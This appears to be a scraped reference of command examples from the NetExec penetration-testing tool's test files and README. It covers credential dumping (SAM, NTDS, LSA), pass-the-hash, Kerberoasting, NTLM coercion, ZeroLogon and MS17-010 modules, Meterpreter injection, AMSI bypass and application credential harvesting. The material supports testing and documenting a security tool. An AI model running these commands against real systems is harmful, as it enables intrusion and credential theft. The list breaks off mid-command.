### Authenticate to SMB using User/Password File Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Examples of authenticating to SMB using a specified username and password from a file. Includes options to disable bruteforce and continue on success. ```bash netexec smb TARGET_HOST -u TEST_USER_FILE -p TEST_PASSWORD_FILE --no-bruteforce ``` ```bash netexec smb TARGET_HOST -u TEST_USER_FILE -p TEST_PASSWORD_FILE --no-bruteforce --continue-on-success ``` ```bash netexec smb TARGET_HOST -u TEST_USER_FILE -p TEST_PASSWORD_FILE ``` -------------------------------- ### Setup and Execute nxc End-to-End Tests Source: https://github.com/pennyw0rth/netexec/blob/main/tests/README.md Detailed steps to install development dependencies and run end-to-end tests for nxc. This includes options for direct Python execution, Poetry-managed execution, and testing standalone binaries. The `--errors` flag can be appended to any execution command to display full error messages. ```bash poetry install --with dev ``` ```bash python tests/e2e_tests.py -t $IP -u $USER -p $PASS ``` ```bash poetry run python tests/e2e_tests.py -t $IP -u $USER -p $PASS ``` ```bash python tests/e2e_tests.py --executable dist/nxc.exe -t $IP -u $USER -p $PASS ``` -------------------------------- ### Execute WMI Commands and Modules Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Provides examples for interacting with WMI on a target host using Kerberos authentication. Covers executing arbitrary commands, specifying WMI namespaces, and running various WMI-specific modules. ```bash netexec wmi TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS ``` ```bash netexec wmi TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --wmi-namespace root/cimv2 ``` ```bash netexec wmi TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -x whoami ``` ```bash netexec wmi TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ioxidresolver ``` ```bash netexec wmi TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M spooler ``` ```bash netexec wmi TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M zerologon ``` ```bash netexec wmi TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M enum_dns ``` ```bash netexec wmi TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M get_netconnections ``` ```bash netexec wmi TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M bitlocker ``` -------------------------------- ### netexec RDP Module Commands Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Examples of using the netexec RDP module for authentication and specific actions. This includes standard RDP authentication, RDP authentication with DNS resolution, and capturing NLA screenshots. ```Shell netexec rdp TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS netexec {DNS} rdp TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS netexec rdp TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --nla-screenshot ``` -------------------------------- ### Execute SMB Modules with Kerberos Authentication Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Demonstrates how to execute various `netexec` SMB modules against a target host using Kerberos authentication. Includes examples for specific module options like `MAX_FILE_SIZE` for `spider_plus`, `ACTION` for `wdigest`, and `URL` for `web_delivery`. ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M spider_plus -o MAX_FILE_SIZE=100 ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M spooler ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M teams_localdb ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M test_connection -o HOST=localhost ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M uac ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M veeam ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M vnc ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M vnc -o NO_REMOTEOPS=True ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M wam ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M wdigest -o ACTION=enable ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M wdigest -o ACTION=disable ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M webdav ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M webdav -o MSG="Message: {}" ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M wifi ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M winscp ``` ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M zerologon ``` -------------------------------- ### netexec FTP Module Commands Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Examples of using the netexec FTP module for authentication, listing directories, and transferring files (put/get). This includes options for controlling bruteforce attempts and continuing on success. ```Shell netexec ftp TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD netexec ftp TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --ls netexec ftp TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --put tests/data/test_file.txt test_file.txt netexec ftp TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --get test_file.txt netexec ftp TARGET_HOST -u TEST_USER_FILE -p TEST_PASSWORD_FILE --no-bruteforce netexec ftp TARGET_HOST -u TEST_USER_FILE -p TEST_PASSWORD_FILE --no-bruteforce --continue-on-success netexec ftp TARGET_HOST -u TEST_USER_FILE -p TEST_PASSWORD_FILE ``` -------------------------------- ### NetExec SMB Kerberos: Scuffy Module for Service Interaction Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Examples of the 'scuffy' module, which interacts with services on the target system. It allows specifying a server and service name, and includes an option for cleanup after operations. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M scuffy -o NAME=test CLEANUP=True ``` -------------------------------- ### Install NetExec on Linux using pipx Source: https://github.com/pennyw0rth/netexec/blob/main/README.md This snippet provides commands to install NetExec on Linux systems. It leverages `pipx` for isolated Python package installations, which helps prevent dependency conflicts with system-wide Python environments. The installation process requires `pipx` and `git` to be present on the system. ```bash sudo apt install pipx git pipx ensurepath pipx install git+https://github.com/Pennyw0rth/NetExec ``` -------------------------------- ### netexec NFS Module Commands Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Examples of using the netexec NFS module for enumerating and interacting with NFS shares. This includes listing available shares, performing detailed share enumeration, and transferring files to and from NFS shares. ```Shell netexec nfs TARGET_HOST -u "" -p "" --shares netexec nfs TARGET_HOST -u "" -p "" --enum-shares netexec nfs TARGET_HOST -u "" -p "" --get-file /NFStest/test/test.txt ../test.txt netexec nfs TARGET_HOST -u "" -p "" --put-file ../test.txt /NFStest/test ``` -------------------------------- ### NetExec SMB Kerberos: Reg-Query Module for Registry Queries Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Illustrates the 'reg-query' module for querying the Windows Registry on a remote host. This example shows how to retrieve a specific key's value from a given path in the HKLM hive. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M reg-query -o PATH=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion KEY=DevicePath ``` -------------------------------- ### Run nxc Unit Tests with Pytest Source: https://github.com/pennyw0rth/netexec/blob/main/tests/README.md Instructions for executing unit tests for the nxc project. Ensure nxc is installed either in a virtual environment or via Poetry before running these commands. ```bash pytest ``` ```bash poetry run pytest ``` -------------------------------- ### NetExec SMB Kerberos: Slinky Module for Service Interaction Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Examples of the 'slinky' module, similar to 'scuffy', which interacts with services on the target system. It allows specifying a server and service name, and includes an option for cleanup after operations. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M slinky -o SERVER=127.0.0.1 NAME=test ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M slinky -o NAME=test CLEANUP=True ``` -------------------------------- ### netexec MSSQL Module Commands Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Examples of using the netexec MSSQL module for various post-exploitation activities. This includes executing Empire modules, listing shares, injecting Metasploit payloads, performing privilege escalation, dumping credentials, testing connections, and delivering web payloads. ```Shell netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD -M empire_exec netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -L netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4443 RAND=12345 netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M mssql_priv netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M nanodump netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M test_connection -o HOST=localhost netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle ``` -------------------------------- ### netexec SSH Module Commands Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Examples of using the netexec SSH module for various authentication methods (password, key-file, empty password), bruteforce control, sudo privilege checking with different methods (stdin, mkfifo), and file transfer operations (put/get). ```Shell netexec ssh TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD netexec ssh TARGET_HOST -u TEST_USER_FILE -p TEST_PASSWORD_FILE --no-bruteforce netexec ssh TARGET_HOST -u TEST_USER_FILE -p TEST_PASSWORD_FILE --no-bruteforce --continue-on-success netexec ssh TARGET_HOST -u TEST_USER_FILE -p TEST_PASSWORD_FILE netexec ssh TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --key-file tests/data/test_key.priv netexec ssh TARGET_HOST -u LOGIN_USERNAME -p '' --key-file tests/data/test_key.priv netexec ssh TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --sudo-check netexec ssh TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --sudo-check --sudo-check-method sudo-stdin netexec ssh TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --sudo-check --sudo-check-method sudo-stdin --get-output-tries 10 netexec ssh TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --sudo-check --sudo-check-method mkfifo netexec ssh TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --sudo-check --sudo-check-method mkfifo --get-output-tries 10 netexec ssh TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --put-file TEST_NORMAL_FILE /tmp/test_file.txt --put-file TEST_NORMAL_FILE /tmp/test_file2.txt netexec ssh TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD --get-file /tmp/test_file.txt /tmp/test_file.txt --get-file /tmp/test_file.txt /tmp/test_file2.txt ``` -------------------------------- ### NetExec SMB Kerberos: Application-Specific Credential Access Modules Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Provides examples of using various NetExec modules designed to interact with or extract information from specific applications like MobaXterm, mRemoteNG, Notepad, Notepad++, PuTTY, and RDCMan. These modules often target configuration files or memory for credential harvesting. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M mobaxterm ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M mremoteng ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M notepad ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M notepad++ ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M putty ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M rdcman ``` -------------------------------- ### NetExec SMB Kerberos: Coerce_Plus Module for Coercion Attacks Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Comprehensive examples of the 'coerce_plus' module, which facilitates various NTLM coercion attacks like PetitPotam, PrinterBug, ShadowCoerce, Mseven, and DFSCoerce. It supports specifying the attack method and an optional listener IP address for receiving coerced authentications. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o METHOD=petitpotam ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o METHOD=printerbug ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o METHOD=shadowcoerce ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o METHOD=mseven ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o METHOD=dfscoerce ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o M=dfs ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o LISTENER=127.0.0.1 ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o METHOD=petitpotam LISTENER=127.0.0.1 ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o METHOD=printerbug LISTENER=127.0.0.1 ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o METHOD=shadowcoerce LISTENER=127.0.0.1 ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o METHOD=mseven LISTENER=127.0.0.1 ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o METHOD=dfscoerce LISTENER=127.0.0.1 ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M coerce_plus -o M=dfs LISTENER=127.0.0.1 ``` -------------------------------- ### Display netexec Generic Help Options Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt This command displays the general help message for the netexec tool, listing all available modules and global options. It's useful for quickly understanding the tool's capabilities and available functionalities. ```Shell netexec -h ``` -------------------------------- ### NetExec SMB: List Available Modules Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Lists all available SMB modules that can be used with NetExec. This command helps in discovering the functionalities supported by the tool for SMB interactions. ```APIDOC netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -L - Lists all available SMB modules for the specified target. - Parameters: - TARGET_HOST: The target IP address or hostname. - LOGIN_USERNAME: The username for authentication. - LOGIN_PASSWORD: The password for authentication. - KERBEROS: Use Kerberos authentication. ``` -------------------------------- ### Authenticate to SMB using Hash File Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Demonstrates how to authenticate to an SMB target using NTLM hashes provided in a file, useful for pass-the-hash attacks. ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -H tests/data/test_hashes.txt ``` ```bash netexec smb TARGET_HOST -u TEST_USER_FILE -H tests/data/test_hashes.txt ``` -------------------------------- ### NetExec SMB: Drop Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt No description -------------------------------- ### Execute Multiple SMB Modules Simultaneously Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Shows how to run multiple `netexec` SMB modules in a single command, streamlining reconnaissance and exploitation efforts against a target host. ```bash netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M spooler -M petitpotam -M zerologon -M nopac -M enum_av -M enum_dns -M gpp_autologin -M gpp_password -M lsassy -M impersonate -M install_elevated -M ioxidresolver -M ms17-010 -M ntlmv1 -M runasppl -M uac -M webdav -M wifi -M coerce_plus ``` -------------------------------- ### Execute PowerShell Commands over SMB with NetExec Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Demonstrates various methods and options for executing PowerShell commands on a target host via SMB. This includes specifying execution methods (atexec, smbexec, mmcexec), forcing 32-bit PowerShell, applying obfuscation, bypassing AMSI, and controlling command encoding. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --exec-method atexec netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --exec-method smbexec netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --exec-method mmcexec netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --obfs netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 --obfs netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --amsi-bypass AMSI_BYPASS_FILE netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 --obfs --amsi-bypass AMSI_BYPASS_FILE netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --obfs --amsi-bypass AMSI_BYPASS_FILE netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 --amsi-bypass AMSI_BYPASS_FILE netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --no-encode netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 --no-encode netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --obfs --no-encode netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 --obfs --no-encode netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --obfs --amsi-bypass AMSI_BYPASS_FILE --no-encode netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 --obfs --amsi-bypass AMSI_BYPASS_FILE --no-encode netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 --obfs --amsi-bypass AMSI_BYPASS_FILE --no-encode --exec-method atexec netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 --obfs --amsi-bypass AMSI_BYPASS_FILE --no-encode --exec-method smbexec netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 --obfs --amsi-bypass AMSI_BYPASS_FILE --no-encode --exec-method mmcexec ``` -------------------------------- ### Perform SMB Anonymous Authentication Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Illustrates how to attempt anonymous authentication against an SMB target, useful for checking for vulnerabilities like ZeroLogon or PetitPotam when no credentials are available. ```bash netexec smb TARGET_HOST -u '' -p '' -M zerologon ``` ```bash netexec smb TARGET_HOST -u '' -p '' -M petitpotam ``` -------------------------------- ### netexec SMB Module Commands Reference Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt This section provides a comprehensive reference for the netexec SMB module, detailing various commands for interacting with Windows SMB services. It covers authentication, host enumeration, session management, credential dumping, file transfers, and remote command execution capabilities. ```APIDOC netexec smb TARGET_HOST [OPTIONS] - TARGET_HOST: The IP address or hostname of the target SMB server. - OPTIONS: - Authentication Options: - -u LOGIN_USERNAME -p LOGIN_PASSWORD: Authenticate with a specified username and password. - KERBEROS: Use Kerberos authentication. This typically requires prior Kerberos ticket setup. - {DNS}: Resolve the target hostname via DNS before attempting to connect. - Host File Generation: - --generate-hosts-file PATH: Generate a hosts file containing discovered targets. - --generate-krb5-file PATH: Generate a krb5.conf file for Kerberos configuration. - Enumeration Options: - --shares: Enumerate accessible SMB shares on the target. - --no-smbv1: Exclude SMBv1 shares from the enumeration results. - --filter-shares READ WRITE: Filter enumerated shares by specified permissions (e.g., READ, WRITE, FULL). - --pass-pol: Enumerate the target's password policy. - --disks: Enumerate accessible disk drives on the target. - --groups: Enumerate local groups on the target system. - --loggedon-users: Enumerate currently logged-on users. - --users: Enumerate local users on the target. - --users-export PATH: Export enumerated users to a specified local file. - --computers: Enumerate domain computers. - --rid-brute: Perform a RID brute-force attack to enumerate users. - --local-groups: Enumerate local groups on the target (specifically for local accounts). - --qwinsta: Enumerate active RDP/console sessions. - --tasklist: Enumerate running processes on the target. - --taskkill PID|PROCESS_NAME: Terminate a process by its Process ID (PID) or name. - Credential Dumping / Sensitive Data: - --sam: Dump the Security Account Manager (SAM) database. - --ntds: Dump the NTDS.dit (Active Directory database). - --lsa: Dump Local Security Authority (LSA) secrets. - --dpapi: Dump Data Protection API (DPAPI) master keys. - File Transfer Operations: - --put-file LOCAL_PATH REMOTE_PATH: Upload a file from the local system (LOCAL_PATH) to the target's remote path (REMOTE_PATH). - --get-file REMOTE_PATH LOCAL_PATH: Download a file from the target's remote path (REMOTE_PATH) to the local system (LOCAL_PATH). - Remote Command Execution: - -x COMMAND: Execute an arbitrary command on the target system. - --exec-method METHOD: Specify the execution method (e.g., atexec, smbexec, mmcexec). - Relay and Delegation Options: - --gen-relay-list PATH: Generate a list of potential relay targets to a file. - --local-auth: Attempt authentication using local credentials (e.g., for pass-the-hash scenarios). - --delegate LOGIN_USERNAME: Perform a delegation attack for a specified user. - --self: Perform a delegation attack to self. - SCCM Interaction: - --sccm: Interact with System Center Configuration Manager (SCCM). - --sccm wmi: Interact with SCCM specifically via WMI. ``` -------------------------------- ### NetExec SMB Kerberos: RunAsPPL Module for Bypass Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Shows the usage of the 'runasppl' module, which is typically used to bypass Protected Process Light (PPL) protections. This can be critical for injecting into or manipulating protected processes. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M runasppl ``` -------------------------------- ### NetExec SMB Kerberos: PI Module for Process Interaction Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Demonstrates the 'pi' (Process Interaction) module, which allows for listing processes or executing commands within a specific process ID (PID). This module is useful for advanced code execution and process manipulation. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M pi ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M pi -o PID=100 EXEC='dir' ``` -------------------------------- ### netexec MSSQL Module Commands Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Documents general commands for interacting with Microsoft SQL Server (MSSQL) using netexec, including authentication methods and specific enumeration techniques like RID brute-forcing. ```APIDOC netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS - Base command for MSSQL operations. - Parameters: - TARGET_HOST: The target MSSQL server (IP address or hostname). - LOGIN_USERNAME: Username for authentication. - LOGIN_PASSWORD: Password for authentication. - KERBEROS: Specifies Kerberos authentication. netexec {DNS} mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS - MSSQL operations with DNS resolution capabilities. - {DNS}: Placeholder for DNS-related options or context. netexec mssql TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --rid-brute - Performs RID (Relative Identifier) brute-forcing against the MSSQL target. ``` -------------------------------- ### NetExec SMB Kerberos: Met_Inject Module for Meterpreter Injection Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Illustrates how to use the 'met_inject' module to inject a Meterpreter payload into a target system via SMB, authenticated with Kerberos. It requires specifying the SRVHOST, SRVPORT, and a random value for the payload. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4443 RAND=12345 ``` -------------------------------- ### Perform LDAP Enumeration and Attacks Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Illustrates various LDAP operations using `netexec`, including user and group enumeration, SID retrieval, AS-REP Roasting, Kerberoasting, and identifying trusted-for-delegation accounts. ```bash netexec {DNS} ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS ``` ```bash netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --users ``` ```bash netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --users-export /tmp/userlistOutputFilename.txt ``` ```bash netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --groups ``` ```bash netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --get-sid ``` ```bash netexec ldap TARGET_HOST -u LOGIN_USERNAME -p '' --asreproast /tmp/output.txt ``` ```bash netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --kerberoasting /tmp/output2.txt ``` ```bash netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --trusted-for-delegation ``` ```bash netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --admin-count ``` ```bash netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --gmsa ``` -------------------------------- ### NetExec SMB Kerberos: RDP Module for Remote Desktop Management Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Demonstrates how to use the 'rdp' module to enable or disable the Remote Desktop Protocol service on a target system. This can be useful for establishing or denying remote access. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M rdp -o ACTION=enable ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M rdp -o ACTION=disable ``` -------------------------------- ### NetExec SMB Kerberos: Masky Module for CA Configuration Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Demonstrates using the 'masky' module with NetExec's SMB Kerberos authentication to specify a Certificate Authority (CA) for operations. This is crucial for scenarios requiring specific certificate trust or manipulation. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M masky -o CA="host.domain.tld\domain-host-CA" ``` -------------------------------- ### NetExec SMB Kerberos: Exploitation and Credential Dumping Modules Source: https://github.com/pennyw0rth/netexec/blob/main/tests/e2e_commands.txt Covers modules for specific exploits and credential dumping techniques. This includes the MS17-010 exploit, Microsoft Online (MSOL) related actions, NanoDump for credential extraction, NoPAC for privilege escalation, NTDSUtil for Active Directory database interaction, NTLMv1 for NTLMv1 hash attacks, and PetitPotam for NTLM relay attacks. ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ms17-010 ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M msol ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M nanodump ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M nopac ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ntdsutil ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ntlmv1 ``` ```CLI netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD 